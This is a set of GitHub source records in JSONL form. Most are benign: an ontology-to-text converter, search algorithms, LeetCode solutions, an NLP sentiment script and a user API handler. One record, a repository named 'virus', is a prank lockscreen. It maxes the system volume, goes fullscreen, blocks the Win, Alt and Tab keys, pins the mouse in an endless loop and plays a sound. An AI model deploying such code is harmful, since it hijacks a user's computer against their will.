inf.PhenoScript_NL):\n #if issubclass(prop, owl.ObjectProperty) or issubclass(prop, owl.DatatypeProperty):\n #print(n2, prop, \"is\", asrt)\n has_out_edge = True\n if has_out_edge == False:\n print(n2, prop, \"is\", asrt)\n presesnt_tag.add(n2)\n\n\n\nfor ind in presesnt_tag:\n txt = \": present\"\n print(ind, txt)\n ind.PhenoScript_NL.append(txt)\n\n#---------------------\n\nspp=obo.CDAO_0000138.instances()\nfocal_sp=spp[0]\nfocal_org = focal_sp.IAO_0000219[0]\n\nparts_org=focal_org.BFO_0000051\n\n# taxon name\nfor i in focal_sp.IAO_0000219:\n print(i, i.is_a)\n if (len(i.is_a[0].has_rank) > 0):\n sp_name = '# ' + i.is_a[0].label.first() + '\\n\\n'\n\n\n# DD is the final description\nDD = ''\nvisited_triples=list()\nfor ind in parts_org:\n xx = traverseOntoMark_Overleaf(ind, visited_nodes=set())\n if not xx == ';':\n DD = DD + (str(renderNL(ind))+xx) + '\\n'\n print(str(renderNL(ind))+xx)\n\nprint(DD)\ntype(DD)\nlen(DD)\nxx = DD.replace(\"\\t [\", \"\\t- [\")\nxx = xx.replace(\"\\n [\", \"\\n- [\")\nxx = '-'+xx\nxx = sp_name + xx\nprint(xx)\n\n\n\n# --- Save\n#DD_file = '/Users/taravser/Documents/My_papers/PhenoScript_main/Semantic_Descriptions/Gryonoides/NL/out.txt'\nDD_file = '/Users/taravser/Documents/My_papers/pheno-repo/Phenoscript/NL/bees.md'\nfile1 = open(DD_file, \"w+\")\nfile1.writelines(xx)\nfile1.close()\n\n\n# to markdown\nmarkdown.markdownFromFile(input=DD_file, output='/Users/taravser/Documents/My_papers/pheno-repo/Phenoscript/NL/bees.html')\n\n\n\ndef traverseOntoMark_Overleaf(ind0, tabs=\"\\t\", visited_nodes=set()):\n global visited_triples\n #print(visited_triples)\n txt=\"\"\n visited_nodes.add(ind0)\n triples=[]\n for prop in ind0.get_properties():\n if not issubclass(prop, owl.AnnotationProperty):\n #print(prop)\n for value in prop[ind0]:\n asrt=inf.PhenoScript_original_assertion[ind0, prop, value]\n triple = [ind0, prop, value]\n if len(asrt) > 0 and (triple not in visited_triples): # should be also True for asrt\n #triple = [ind0, prop, value]\n #print(asrt)\n triples.append(triple)\n visited_triples.append(triple)\n #elif issubclass(prop, inf.PhenoScript_NL) or issubclass(prop, inf.PhenoScript_implies_absence_of):\n elif issubclass(prop, inf.PhenoScript_NL):\n for value in prop[ind0]:\n triple = [ind0, prop, value]\n if (triple not in visited_triples):\n #triple = [ind0, prop, value]\n triples.append(triple)\n visited_triples.append(triple)\n if len(triples)==1:\n prop=triples[0][1]\n value=triples[0][2]\n #txt = txt + (\" <%s> %s\" % (prop, value))\n txt = txt + (\"%s%s\" % (renderNL(prop), renderNL(value)))\n if issubclass(prop, owl.ObjectProperty) and (value not in visited_nodes):\n #print(traverseOnto(value))\n #visited_nodes.add(value)\n txt = txt + traverseOntoMark_Overleaf(value, tabs=tabs, visited_nodes=visited_nodes)\n return txt\n if len(triples) > 1:\n for trip in triples:\n # trip= triples[0]\n prop = trip[1]\n value = trip[2]\n #txt = txt +\"\\n\" + tabs + (\"%s <%s> %s\" % (ind0, prop, value))\n txt = txt + \"\\n\" + tabs + (\"%s%s%s\" % (renderNL(ind0), renderNL(prop), renderNL(value)))\n if issubclass(prop, owl.ObjectProperty) and (value not in visited_nodes):\n txt = txt + traverseOntoMark_Overleaf(value, tabs=tabs+\"\\t\", visited_nodes=visited_nodes)\n return txt\n if len(triples) == 0:\n return \";\"\n\n\ndef renderNL(x):\n # if x is individual\n if isinstance(x, owl.Thing):\n return \" [%s](%s)\" % (x.PhenoScript_original_class[0], x.PhenoScript_original_class[0].iri)\n elif issubclass(x, owl.ObjectProperty) or issubclass(x, owl.DatatypeProperty):\n dict={obo.BFO_0000051 :',', obo.BFO_0000050 : ' of', obo.RO_0000053 : ':', obo.RO_0000052 : ' of', pato.increased_in_magnitude_relative_to : ' larger than', pato.decreased_in_magnitude_relative_to : ' smaller than'}\n if x in dict:\n return dict[x]\n else:\n return \" [%s](%s)\" % (x.label.first(), x.iri)\n elif issubclass(x, owl.AnnotationProperty):\n return \"\"\n elif isinstance(x, (int, float)):\n return \" %s\" % str(x)\n elif isinstance(x, str):\n return x","repo_name":"sergeitarasov/PhenoScript","sub_path":"archive/convert_to_NL_Overleaf.py","file_name":"convert_to_NL_Overleaf.py","file_ext":"py","file_size_in_byte":9868,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"25757928611","text":"def iterative_deepening_search(graph, start, goal):\n depth = 0\n time = 0\n explore_nodes_list = []\n\n while True:\n r_time, r_explored_nodes, r_path = depth_limited_tree_search(graph, start, goal, depth)\n\n if r_time is None:\n return None, None, None # failure\n\n explore_nodes_list.append(r_explored_nodes)\n time += r_time\n depth += 1\n\n if r_path is not None:\n return time, explore_nodes_list, r_path # solution\n\n\n\"\"\"\nDepth limited tree search (DLTS for short)\nInput: the maze's info as a graph, start state, goal state, limit depth\nReturn: - success: the time to escape the maze, the list of explored nodes, the list of nodes on the path found\n - cutoff: the time to try to escape the maze within the limit depth, the list of explored nodes, None\n - failure: None, None, None\n\"\"\"\ndef depth_limited_tree_search(graph, start, goal, depth):\n if start == goal:\n return 1, [start], [start]\n\n explored = []\n current_path = []\n on_current_path = dict()\n for state in graph:\n on_current_path[state] = False\n\n return recursive_depth_limited_tree_search(graph, start, goal, depth, explored, current_path, on_current_path)\n\n\n\"\"\"\nRecursive depth limited tree search (RDLTS for short): Help the DLTS algorithm to explore nodes recursively.\nInput: the maze's info as a graph, start state, goal state, limit depth,\n the list of explored nodes, the list of nodes on the current path,\n the dictionary for checking if a node is on the currentpath\nReturn: - success: the time to escape the maze, the list of explored nodes, the list of nodes on the path found\n - cutoff: the time to try to escape the maze within the limit depth, the list of explored nodes, None\n - failure: None, None, None\n\"\"\"\ndef recursive_depth_limited_tree_search(graph, state, goal, depth, explored, current_path, on_current_path):\n explored.append(state)\n current_path.append(state)\n on_current_path[state] = True\n\n if state == goal:\n return len(explored), explored, current_path # solution\n elif depth == 0:\n return len(explored), explored, None # cutoff\n\n cutoff_occured = False\n\n child_state_list = sorted(graph[state])\n for child_state in child_state_list:\n if not on_current_path[child_state]:\n time, explored_nodes, path = recursive_depth_limited_tree_search(graph, child_state, goal, depth - 1,\n explored, current_path, on_current_path)\n\n if time is None or path is None:\n on_current_path[current_path.pop()] = False\n\n if time is not None and path is None:\n cutoff_occured = True\n elif path is not None:\n return time, explored_nodes, path # not failure\n\n if cutoff_occured:\n return len(explored), explored, None # cutoff\n\n return None, None, None # failure\n","repo_name":"kieuconghau/search-strategies","sub_path":"18127259/SOURCE/IDS.py","file_name":"IDS.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888297012","text":"\"\"\"\nGiven a non-empty binary tree, find the maximum path sum.\n\nFor this problem, a path is defined as any sequence of nodes from some starting node to any node in the tree along the parent-child connections. The path must contain at least one node and does not need to go through the root.\n\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def maxPathSum(self, root: TreeNode) -> int:\n self.ans = float(\"-inf\")\n def traverse(node): \n if not node:\n return 0\n l = traverse(node.left)\n r = traverse(node.right)\n # find the max of path sum (l+r+node) need the max of left subtree and max of right subtree\n self.ans = max(self.ans, l+r+node.val) \n # return max sum for the parent node (left/right subtree)\n return max(l+node.val, r+node.val, 0) \n traverse(root)\n return self.ans\n \n def maxPathSum(self, root: Optional[TreeNode]) -> int:\n res = float(\"-inf\")\n \n def helper(node):\n nonlocal res\n # if not root, return 0\n if not node:\n return 0\n # get the max path sum from left subtree\n l = max(0, helper(node.left))\n # get the max path sum from right subtree\n r = max(0, helper(node.right))\n # for the current node, compare the max sum with left+right+node.val\n res = max(res, l+r+node.val)\n \n # return max(left, right) + node.val to the parent and do not return neg value\n return max(l, r) + node.val\n \n helper(root)\n return res\n \nif __name__ == '__main__':\n s = Solution()\n print(s.maxPathSum([-10,9,20,null,null,15,7]))\n \n \n \n ","repo_name":"xiaofanc/leetcode","sub_path":"0124-binary-tree-maximum-path-sum.py","file_name":"0124-binary-tree-maximum-path-sum.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14520154935","text":"#production Toretto Company\r\nimport keyboard\r\nimport pygame\r\nimport sys\r\nimport time\r\nimport ctypes\r\n\r\nSendInput = ctypes.windll.user32.SendInput\r\n\r\nPUL = ctypes.POINTER(ctypes.c_ulong)\r\n\r\nclass KeyBdInput(ctypes.Structure):\r\n _fields_ = [\r\n (\"wVk\", ctypes.c_ushort),\r\n (\"wScan\", ctypes.c_ushort),\r\n (\"dwFlags\", ctypes.c_ulong),\r\n (\"time\", ctypes.c_ulong),\r\n (\"dwExtraInfo\", PUL)\r\n ]\r\n\r\nclass HardwareInput(ctypes.Structure):\r\n _fields_ = [\r\n (\"uMsg\", ctypes.c_ulong),\r\n (\"wParamL\", ctypes.c_short),\r\n (\"wParamH\", ctypes.c_ushort)\r\n ]\r\n\r\nclass MouseInput(ctypes.Structure):\r\n _fields_ = [\r\n (\"dx\", ctypes.c_long),\r\n (\"dy\", ctypes.c_long),\r\n (\"mouseData\", ctypes.c_ulong),\r\n (\"dwFlags\", ctypes.c_ulong),\r\n (\"time\",ctypes.c_ulong),\r\n (\"dwExtraInfo\", PUL)\r\n ]\r\n\r\nclass Input_I(ctypes.Union):\r\n _fields_ = [\r\n (\"ki\", KeyBdInput),\r\n (\"mi\", MouseInput),\r\n (\"hi\", HardwareInput)\r\n ]\r\n\r\nclass Input(ctypes.Structure):\r\n _fields_ = [\r\n (\"type\", ctypes.c_ulong),\r\n (\"ii\", Input_I)\r\n ]\r\n\r\nclass Keyboard:\r\n VK_BACKSPACE = 0x08\r\n VK_ENTER = 0x0D\r\n VK_CTRL = 0x11\r\n VK_ALT = 0x12\r\n VK_0 = 0x30\r\n VK_1 = 0x31\r\n VK_2 = 0x32\r\n VK_3 = 0x33\r\n VK_4 = 0x34\r\n VK_5 = 0x35\r\n VK_6 = 0x36\r\n VK_7 = 0x37\r\n VK_8 = 0x38\r\n VK_9 = 0x39\r\n VK_A = 0x41\r\n VK_B = 0x42\r\n VK_C = 0x43\r\n VK_D = 0x44\r\n VK_E = 0x45\r\n VK_F = 0x46\r\n VK_G = 0x47\r\n VK_H = 0x48\r\n VK_I = 0x49\r\n VK_J = 0x4A\r\n VK_K = 0x4B\r\n VK_L = 0x4C\r\n VK_M = 0x4D\r\n VK_N = 0x4E\r\n VK_O = 0x4F\r\n VK_P = 0x50\r\n VK_Q = 0x51\r\n VK_R = 0x52\r\n VK_S = 0x53\r\n VK_T = 0x54\r\n VK_U = 0x55\r\n VK_V = 0x56\r\n VK_W = 0x57\r\n VK_X = 0x58\r\n VK_Y = 0x59\r\n VK_Z = 0x5A\r\n VK_VOLUME_MUTE = 0xAD\r\n VK_VOLUME_DOWN = 0xAE\r\n VK_VOLUME_UP = 0xAF\r\n VK_MEDIA_NEXT_TRACK = 0xB0\r\n VK_MEDIA_PREV_TRACK = 0xB1\r\n VK_MEDIA_PLAY_PAUSE = 0xB3\r\n VK_MEDIA_STOP = 0xB2\r\n VK_LBUTTON = 0x01\r\n VK_RBUTTON = 0x02\r\n VK_CANCEL = 0x03\r\n VK_MBUTTON = 0x04\r\n VK_XBUTTON1 = 0x05\r\n VK_XBUTTON2 = 0x06\r\n VK_BACK = 0x08\r\n VK_TAB = 0x09\r\n VK_CLEAR = 0x0C\r\n VK_RETURN = 0x0D\r\n VK_SHIFT = 0x10\r\n VK_CONTROL = 0x11\r\n VK_MENU = 0x12\r\n VK_PAUSE = 0x13\r\n VK_CAPITAL = 0x14\r\n VK_KANA = 0x15\r\n VK_HANGUEL = 0x15\r\n VK_HANGUL = 0x15\r\n VK_JUNJA = 0x17\r\n VK_FINAL = 0x18\r\n VK_HANJA = 0x19\r\n VK_KANJI = 0x19\r\n VK_ESCAPE = 0x1B\r\n VK_CONVERT = 0x1C\r\n VK_NONCONVERT = 0x1D\r\n VK_ACCEPT = 0x1E\r\n VK_MODECHANGE = 0x1F\r\n VK_SPACE = 0x20\r\n VK_PRIOR = 0x21\r\n VK_NEXT = 0x22\r\n VK_END = 0x23\r\n VK_HOME = 0x24\r\n VK_LEFT = 0x25\r\n VK_UP = 0x26\r\n VK_RIGHT = 0x27\r\n VK_DOWN = 0x28\r\n VK_SELECT = 0x29\r\n VK_PRINT = 0x2A\r\n VK_EXECUTE = 0x2B\r\n VK_SNAPSHOT = 0x2C\r\n VK_INSERT = 0x2D\r\n VK_DELETE = 0x2E\r\n VK_HELP = 0x2F\r\n VK_LWIN = 0x5B\r\n VK_RWIN = 0x5C\r\n VK_APPS = 0x5D\r\n VK_SLEEP = 0x5F\r\n VK_NUMPAD0 = 0x60\r\n VK_NUMPAD1 = 0x61\r\n VK_NUMPAD2 = 0x62\r\n VK_NUMPAD3 = 0x63\r\n VK_NUMPAD4 = 0x64\r\n VK_NUMPAD5 = 0x65\r\n VK_NUMPAD6 = 0x66\r\n VK_NUMPAD7 = 0x67\r\n VK_NUMPAD8 = 0x68\r\n VK_NUMPAD9 = 0x69\r\n VK_MULTIPLY = 0x6A\r\n VK_ADD = 0x6B\r\n VK_SEPARATOR = 0x6C\r\n VK_SUBTRACT = 0x6D\r\n VK_DECIMAL = 0x6E\r\n VK_DIVIDE = 0x6F\r\n VK_F1 = 0x70\r\n VK_F2 = 0x71\r\n VK_F3 = 0x72\r\n VK_F4 = 0x73\r\n VK_F5 = 0x74\r\n VK_F6 = 0x75\r\n VK_F7 = 0x76\r\n VK_F8 = 0x77\r\n VK_F9 = 0x78\r\n VK_F10 = 0x79\r\n VK_F11 = 0x7A\r\n VK_F12 = 0x7B\r\n VK_F13 = 0x7C\r\n VK_F14 = 0x7D\r\n VK_F15 = 0x7E\r\n VK_F16 = 0x7F\r\n VK_F17 = 0x80\r\n VK_F18 = 0x81\r\n VK_F19 = 0x82\r\n VK_F20 = 0x83\r\n VK_F21 = 0x84\r\n VK_F22 = 0x85\r\n VK_F23 = 0x86\r\n VK_F24 = 0x87\r\n VK_NUMLOCK = 0x90\r\n VK_SCROLL = 0x91\r\n VK_LSHIFT = 0xA0\r\n VK_RSHIFT = 0xA1\r\n VK_LCONTROL = 0xA2\r\n VK_RCONTROL = 0xA3\r\n VK_LMENU = 0xA4\r\n VK_RMENU = 0xA5\r\n VK_BROWSER_BACK = 0xA6\r\n VK_BROWSER_FORWARD = 0xA7\r\n VK_BROWSER_REFRESH = 0xA8\r\n VK_BROWSER_STOP = 0xA9\r\n VK_BROWSER_SEARCH = 0xAA\r\n VK_BROWSER_FAVORITES = 0xAB\r\n VK_BROWSER_HOME = 0xAC\r\n VK_LAUNCH_MAIL = 0xB4\r\n VK_LAUNCH_MEDIA_SELECT = 0xB5\r\n VK_LAUNCH_APP1 = 0xB6\r\n VK_LAUNCH_APP2 = 0xB7\r\n VK_OEM_1 = 0xBA\r\n VK_OEM_PLUS = 0xBB\r\n VK_OEM_COMMA = 0xBC\r\n VK_OEM_MINUS = 0xBD\r\n VK_OEM_PERIOD = 0xBE\r\n VK_OEM_2 = 0xBF\r\n VK_OEM_3 = 0xC0\r\n VK_OEM_4 = 0xDB\r\n VK_OEM_5 = 0xDC\r\n VK_OEM_6 = 0xDD\r\n VK_OEM_7 = 0xDE\r\n VK_OEM_8 = 0xDF\r\n VK_OEM_102 = 0xE2\r\n VK_PROCESSKEY = 0xE5\r\n VK_PACKET = 0xE7\r\n VK_ATTN = 0xF6\r\n VK_CRSEL = 0xF7\r\n VK_EXSEL = 0xF8\r\n VK_EREOF = 0xF9\r\n VK_PLAY = 0xFA\r\n VK_ZOOM = 0xFB\r\n VK_NONAME = 0xFC\r\n VK_PA1 = 0xFD\r\n VK_OEM_CLEAR = 0xFE\r\n\r\n def keyDown(keyCode):\r\n extra = ctypes.c_ulong(0)\r\n ii_ = Input_I()\r\n ii_.ki = KeyBdInput(keyCode, 0x48, 0, 0, ctypes.pointer(extra) )\r\n x = Input( ctypes.c_ulong(1), ii_ )\r\n SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))\r\n\r\n def keyUp(keyCode):\r\n extra = ctypes.c_ulong(0)\r\n ii_ = Input_I()\r\n ii_.ki = KeyBdInput(keyCode, 0x48, 0x0002, 0, ctypes.pointer(extra) )\r\n x = Input( ctypes.c_ulong(1), ii_ )\r\n SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))\r\n\r\n def key(keyCode, length = 0):\r\n Keyboard.keyDown(keyCode)\r\n time.sleep(length)\r\n Keyboard.keyUp(keyCode)\r\n\r\n\r\nclass Sound:\r\n __current_volume = None\r\n\r\n @staticmethod\r\n def current_volume():\r\n if Sound.__current_volume is None:\r\n return 0\r\n else:\r\n return Sound.__current_volume\r\n\r\n @staticmethod\r\n def __set_current_volume(volume):\r\n if volume > 100:\r\n Sound.__current_volume = 100\r\n elif volume < 0:\r\n Sound.__current_volume = 0\r\n else:\r\n Sound.__current_volume = volume\r\n\r\n\r\n __is_muted = False\r\n\r\n @staticmethod\r\n def is_muted():\r\n return Sound.__is_muted\r\n\r\n\r\n @staticmethod\r\n def __track():\r\n if Sound.__current_volume == None:\r\n Sound.__current_volume = 0\r\n for i in range(0, 50):\r\n Sound.volume_up()\r\n\r\n\r\n @staticmethod\r\n def mute():\r\n Sound.__track()\r\n Sound.__is_muted = (not Sound.__is_muted)\r\n Keyboard.key(Keyboard.VK_VOLUME_MUTE)\r\n\r\n @staticmethod\r\n def volume_up():\r\n Sound.__track()\r\n Sound.__set_current_volume(Sound.current_volume() + 2)\r\n Keyboard.key(Keyboard.VK_VOLUME_UP)\r\n\r\n @staticmethod\r\n def volume_down():\r\n Sound.__track()\r\n Sound.__set_current_volume(Sound.current_volume() - 2)\r\n Keyboard.key(Keyboard.VK_VOLUME_DOWN)\r\n\r\n\r\n @staticmethod\r\n def volume_set(amount):\r\n Sound.__track()\r\n\r\n if Sound.current_volume() > amount:\r\n for i in range(0, int((Sound.current_volume() - amount) / 2)):\r\n Sound.volume_down()\r\n else:\r\n for i in range(0, int((amount - Sound.current_volume()) / 2)):\r\n Sound.volume_up()\r\n\r\n @staticmethod\r\n def volume_min():\r\n Sound.volume_set(0)\r\n\r\n @staticmethod\r\n def volume_max():\r\n Sound.volume_set(100)\r\n\r\n\r\ndef start_screen():\r\n Sound.volume_max()\r\n pygame.init()\r\n pygame.mixer.init()\r\n screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\r\n pygame.display.set_caption('дурашка')\r\n\r\n fps = 7200\r\n clock = pygame.time.Clock()\r\n keyboard.block_key('win')\r\n keyboard.block_key('alt')\r\n keyboard.block_key('tab')\r\n # for i in '1234567890-=qwertyuiop[]asdfghjkl;\\zxcvbnm,./':\r\n # keyboard.block_key(i)\r\n\r\n screen.fill('black')\r\n pygame.display.flip()\r\n im = pygame.image.load('python_org.png')\r\n flag = False\r\n\r\n while True:\r\n clock.tick(fps)\r\n screen.blit(im, (0, 0))\r\n pygame.mouse.set_pos((500, 500))\r\n\r\n im = pygame.transform.scale(im, (1920, 1080))\r\n screen.blit(im, (0, 0))\r\n pygame.display.flip()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n terminate()\r\n\r\n if not flag:\r\n landing = pygame.mixer.Sound(\"python_org.mp3\")\r\n landing.play(maxtime=2000)\r\n flag = True\r\n\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n\r\n\r\nstart_screen()","repo_name":"Wapppp12q/virus","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70619769014","text":"import io\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn import metrics\nfrom sklearn import linear_model\nfrom sklearn import model_selection\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n\n\ndef load_vectors(fname):\n fin = io.open(\n fname, mode=\"r\", encoding=\"utf-8\", newline=\"\\n\", errors=\"ignore\"\n )\n # n, d = map(int, fin.readline().split())\n data = {}\n for line in fin:\n tokens = line.rstrip().split(\" \")\n data[tokens[0]] = list(map(float, tokens[1:]))\n\n return data\n\n\ndef sentence_to_vec(sent, embedding_dict, stop_words, tokenizer):\n # convert the sentence to string and lowercase it\n words = str(sent).lower()\n\n # tokenize the sentence\n words = tokenizer(words)\n\n # remove the stopwords\n words = [w for w in words if w not in stop_words]\n\n # keep only alpha-numeric tokens\n words = [w for w in words if w.isalpha()]\n\n # empty list to store word_embeddings\n word_embeddings = []\n for w in words:\n # for every word, fetch the embedding vector and\n # append it in the word embedding list\n if w in embedding_dict:\n word_embeddings.append(embedding_dict[w])\n\n # if we don't have any words, return vector of zeros\n if len(word_embeddings) == 0:\n return np.zeros(300)\n\n # convert the embeddings to array\n word_embeddings = np.array(word_embeddings)\n\n # calculate the sum over the rows\n sent_vec = np.sum(word_embeddings, axis=0)\n\n # return the normalized vector\n return sent_vec / np.linalg.norm(sent_vec)\n\n\nif __name__ == \"__main__\":\n # read the training data\n df = pd.read_csv(\"../data/train_folds.csv\")\n print(df.head(2))\n\n # load embeddings into the memory\n print(\"Loading embeddings...\")\n embeddings = load_vectors(\"../data/glove.6B.300d.txt\")\n\n # create sentence embeddings\n print(\"Creating sentence vectors...\")\n vectors = []\n for review in df.review.values:\n sent_vec = sentence_to_vec(\n review, embeddings, stop_words=[], tokenizer=word_tokenize\n )\n vectors.append(sent_vec)\n\n vectors = np.array(vectors)\n\n # fetch lables\n y = df.sentiment.values\n\n # initiate the stratified kfold\n skf = model_selection.StratifiedKFold(n_splits=5)\n\n # iterate through the folds\n for f_, (t_, v_) in enumerate(skf.split(X=vectors, y=y)):\n print(f\"Training fold: {f_}\")\n xtrain = vectors[t_, :]\n ytrain = y[t_]\n\n xvalid = vectors[v_, :]\n yvalid = y[v_]\n\n # initialize logistic regression model\n model = linear_model.LogisticRegression()\n\n # fit the model\n model.fit(xtrain, ytrain)\n\n # make predictions on the validation data\n preds = model.predict(xvalid)\n pred_proba = model.predict_proba(xvalid)[:, 1]\n\n # calculate accuracy and ROC score\n accuracy = metrics.accuracy_score(yvalid, preds)\n auc = metrics.roc_auc_score(yvalid, pred_proba)\n\n print(f\"Accuracy: {accuracy:.5f}, ROC-AUC: {auc:.5f}\")\n print(\"\")\n","repo_name":"LakshyaMalhotra/toy-projects-nlp","sub_path":"imdb-sentiment-analysis/good-old-nlp/sentence_vector.py","file_name":"sentence_vector.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888450612","text":"\"\"\"\ndp[i][k]: ways to form target[0:i] using word[0:k]\n1. we do not use word[k] to form target[i]\ndp[i][k] = dp[i][k-1]\n\n2 we use word[k] to form target[i]\ndp[i][k] += dp[i-1][k-1] * count(how many word[k] == target[i])\n\nn = len(target), m = len(words[0])\nreturn dp[n][m]\n\nsol 2:\nres[j] means the number of ways to form target j first characters.\n\n\"\"\"\n\nclass Solution:\n def numWays(self, words, target):\n n, mod = len(target), 10**9 + 7\n res = [1] + [0] * n\n # print(\"res -->\", res)\n for i in range(len(words[0])):\n # print(\"i\", i)\n count = collections.Counter(w[i] for w in words)\n # print(\"count -->\", count)\n for j in range(min(i, n - 1), -1, -1):\n # print(\"j: \", j)\n res[j + 1] += res[j] * count[target[j]] % mod\n # print(\"res: \", res)\n return res[n] % mod\n\nclass Solution:\n # TLE\n def numWays(self, words: List[str], target: str) -> int: \n size = len(words[0])\n m = 10**9+7\n # number of ways to form target[i:] using words[..][j:]\n @cache\n def dp(i, j): \n # base case: there is one way not to put any characters\n if i == len(target):\n return 1\n # base case: empty string cannot make target\n if j == size:\n return 0\n res = 0\n # count the occ of target[i] in words[..][j]\n # use column j\n cnt = 0\n for word in words:\n if word[j] == target[i]:\n cnt += 1\n # for the current character, there is cnt ways\n res += cnt * dp(i+1, j+1)\n\n # skip column j\n res += dp(i, j+1)\n\n res = res % m\n return res\n return dp(0, 0)\n\nclass Solution:\n # bottom-up DP\n def numWays(self, words: List[str], target: str) -> int: \n size = len(words[0])\n m = 10**9+7\n count = [[0] * 26 for _ in range(size)]\n # count number of chars in position j: O(nk)\n for word in words:\n for j in range(size):\n count[j][ord(word[j]) - ord('a')] += 1\n # number of ways to form target[i:] using words[..][j:]: O(mk)\n @cache\n def dp(i, j): \n # base case: there is one way not to put any characters\n if i == len(target):\n return 1\n # base case: empty string cannot make target\n if j == size:\n return 0\n res = 0\n # count the occ of target[i] in words[..][j]\n # use column j\n # cnt = 0\n # for word in words:\n # if word[j] == target[i]:\n # cnt += 1\n cnt = count[j][ord(target[i]) - ord('a')]\n # for the current character, there is cnt ways\n res += cnt * dp(i+1, j+1)\n\n # skip column j\n res += dp(i, j+1)\n\n res = res % m\n return res\n return dp(0, 0)\n \nif __name__ == '__main__':\n\ts = Solution()\n\tprint(s.numWays([\"acca\",\"bbbb\",\"caca\"], \"aba\")) # 6\n\n\n ","repo_name":"xiaofanc/leetcode","sub_path":"1639-ways-to-form-a-target-string-given-dict.py","file_name":"1639-ways-to-form-a-target-string-given-dict.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20130604725","text":"import inspect\nfrom utils.log import logger as log\nthisFilename = __file__.split(\"/\")[-1]\n\nfrom database.user.user import DBUser\nfrom source.user.add_user import AddUserResource\n\ndbu = DBUser()\naur = AddUserResource()\n\nclass GetUserResource:\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def convertMongoDBObjectsToObjects(self, user: \"list of dict\") -> \"list of dict\":\n user[\"_id\"] = user[\"_id\"][\"$oid\"]\n if user[\"baseLocation\"]:\n user[\"baseLocation\"] = user[\"baseLocation\"][\"$oid\"]\n for otherLocation in user[\"otherLocations\"]:\n otherLocation[\"locationId\"] = otherLocation[\"locationId\"][\"$oid\"]\n otherLocation[\"timeline\"][\"begin\"] = otherLocation[\"timeline\"][\"begin\"][\"$date\"]\n otherLocation[\"timeline\"][\"end\"] = otherLocation[\"timeline\"][\"end\"][\"$date\"]\n for nonAvailability in user[\"nonAvailability\"]:\n nonAvailability[\"timeline\"][\"begin\"] = nonAvailability[\"timeline\"][\"begin\"][\"$date\"]\n nonAvailability[\"timeline\"][\"end\"] = nonAvailability[\"timeline\"][\"end\"][\"$date\"]\n for project in user[\"access\"][\"projects\"]:\n project[\"projectId\"] = project[\"projectId\"][\"$oid\"]\n for milestone in project[\"milestones\"]:\n milestone[\"milestoneId\"] = milestone[\"milestoneId\"][\"$oid\"]\n milestone[\"pulses\"] = [pulse[\"$oid\"] for pulse in milestone[\"pulses\"]]\n if user[\"meta\"][\"addedBy\"]:\n user[\"meta\"][\"addedBy\"] = user[\"meta\"][\"addedBy\"][\"$oid\"]\n if user[\"meta\"][\"addedOn\"]:\n user[\"meta\"][\"addedOn\"] = user[\"meta\"][\"addedOn\"][\"$date\"]\n if user[\"meta\"][\"lastSeen\"]:\n user[\"meta\"][\"lastSeen\"] = user[\"meta\"][\"lastSeen\"][\"$date\"]\n return user\n\n \"\"\"\n REQUEST:\n \"username\": str\n \"displayname\": str\n \"\"\"\n def on_get(self, req, resp):\n responseObj = {\n \"responseId\": 111,\n \"message\": \"\",\n \"data\": {}\n }\n try:\n # 01. get user by username\n user = dbu.getUserByUsername(req.params[\"kartoon-fapi-incoming\"][\"username\"])\n # 02. if user does not exist\n if not user:\n # 02. 01. add user\n aur.addUser(\n req.params[\"kartoon-fapi-incoming\"][\"username\"],\n req.params[\"kartoon-fapi-incoming\"][\"displayname\"],\n None\n )\n # 02. 02. get added user by username\n user = dbu.getUserByUsername(req.params[\"kartoon-fapi-incoming\"][\"username\"])\n # 03. update users' last seen\n dbu.updateLastSeen(user[\"_id\"][\"$oid\"])\n # 04. clean up mongo objects\n user = self.convertMongoDBObjectsToObjects(user)\n # 05. attach user document in response\n responseObj[\"data\"] = user\n # 06. set responseId to success\n responseObj[\"responseId\"] = 211\n except Exception as ex:\n log.error((thisFilename, inspect.currentframe().f_code.co_name), exc_info=True)\n responseObj[\"message\"] = str(ex)\n resp.media = responseObj\n","repo_name":"kartikeybhardwaj/circuit-bapi","sub_path":"source/user/get_user.py","file_name":"get_user.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33738147261","text":"import logging\n\nfrom rxn.utilities.files import (\n PathLike,\n dump_list_to_file,\n iterate_lines_from_file,\n raise_if_paths_are_identical,\n)\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\ndef detokenize_class(tokenized_class: str) -> str:\n \"\"\"\n Function performing a detokenization of the reaction class used in the Transformer classification\n model. E.g. '1 1.2 1.2.3' -> 1.2.3\n\n Args:\n tokenized_class: str to detokenize\n\n Raises:\n ValueError: if the input string format is not correct\n \"\"\"\n if tokenized_class == \"0\":\n return tokenized_class\n\n splitted_class = tokenized_class.split(\" \")\n if len(splitted_class) == 1 and len(splitted_class[0].split(\".\")) == 3:\n # here the class is already detokenized\n return tokenized_class\n if len(splitted_class) != 3:\n raise ValueError(\n f'The class to be 